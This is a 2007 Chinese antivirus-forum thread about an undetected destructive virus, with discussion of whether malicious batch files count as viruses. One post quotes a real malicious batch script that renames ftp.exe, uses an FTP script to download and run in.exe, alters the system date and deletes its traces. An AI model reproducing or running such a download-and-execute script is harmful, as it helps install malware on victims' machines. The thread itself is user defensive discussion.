微点交流论坛

标题: 微点没反映的强大病毒 [打印本页]

作者: caomao202 时间: 2007-10-6 00:42 标题: 微点没反映的强大病毒

运行之后桌面快界方式全部被删除，并且刷新一次就会复制很多，C盘迅雷、瑞星卡卡、显卡驱动、暴风影音2、Winamp、GHOST被删除，微点没反映，病毒作者说采用单一简单行为就可以过微点行为分析库，上传不了附件，请管理员联系：caomao202@sohu.com

作者: 曙光 时间: 2007-10-6 01:02
谢谢楼主对微点的支持，请你将这个样本发送到virus@micropoint.com.cn，然后将你的发送的邮箱，以短消息的形式发给我，我们会尽快分析的！

[ Last edited by Legend on 2007-10-6 at 07:34 ]

作者: 天笑 时间: 2007-10-6 07:33
难道又是一个批处理？

作者: wantcm 时间: 2007-10-6 10:08
貌似是批处理，批处理只要用户不自己运行就没有危害的东西。

平常我们删除/修改文件，发现删除错了那叫误操作。

而恶意批处理是批量的删除/修改文件，也就是批量的误操作。

批处理不是病毒，它没有自我复制传播的能力，只要保持一点点警惕性，不运行可疑的程序，就不会危害系统和文件资料。

说一个不太形象的比喻，杀毒软件好比是保镖，保护系统不会被刺客谋杀，而批处理是毒药，非要吃进去自杀，“保镖”很难顾及到的。

作者: 全能人 时间: 2007-10-6 11:14
这病毒如此厉害，微点一点也没有察觉吗，看来微点要好好改进了！

作者: zx121122 时间: 2007-10-6 14:16
我最近中过好几个批处理的病毒，其中一个批处理的内容：
set a=星期四 2099-01-01
date=2099-01-01
if exist C:\WINNT\system32\dllcache\ftp.exe ren C:\WINNT\system32\dllcache\ftp.exe sft.exe
if exist C:\WINNT\system32\ftp.exe ren C:\WINNT\system32\ftp.exe sft.exe
sft.exe -s:C:\WINNT\help.dll
if not exist in.exe ftp -s:C:\WINNT\help.dll
in.exe
in.exe
date=%a%
:end
del C:\WINNT\help.dll
del C:\WINNT\BEGIN.BAT
exit

作者: 100000 时间: 2007-10-6 18:34
是病毒不够强大！！！---只搞些小动作:lol::lol::lol:

作者: lqwoshifeng 时间: 2007-10-7 15:19

Quote:

Originally posted by wantcm at 2007-10-6 10:08:
貌似是批处理，批处理只要用户不自己运行就没有危害的东西。

平常我们删除/修改文件，发现删除错了那叫误操作。

而恶意批处理是批量的删除/修改文件，也就是批量的误操作。

批处理不是病毒，它没有自我复 ...

说的很有道理，不过虽然它不自运行，但改个名字诱惑你运行是肯定的，他肯定不会起个“我是病毒，别点我”的名。呵呵，很多人就是这样上了当的。不可不防。

作者: topyym 时间: 2007-10-8 10:59
个人愚见，对于批处理文件，无论是恶意的还是有益的（自己编写的无害的批处理），作为杀软或者其他防御性软件，即使不杀，也应该向用户发出警报，告之为批处理文件。

作者: fanyv 时间: 2007-10-8 12:21
同意楼上的观点，发现批处理可以给出提示并且显示其批处理内容！

谨代表个人观点

作者: c14032991 时间: 2007-10-8 17:20
同样建议:发现批处理可以给出提示并且显示其批处理内容！
同意楼上和楼上的楼上....

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn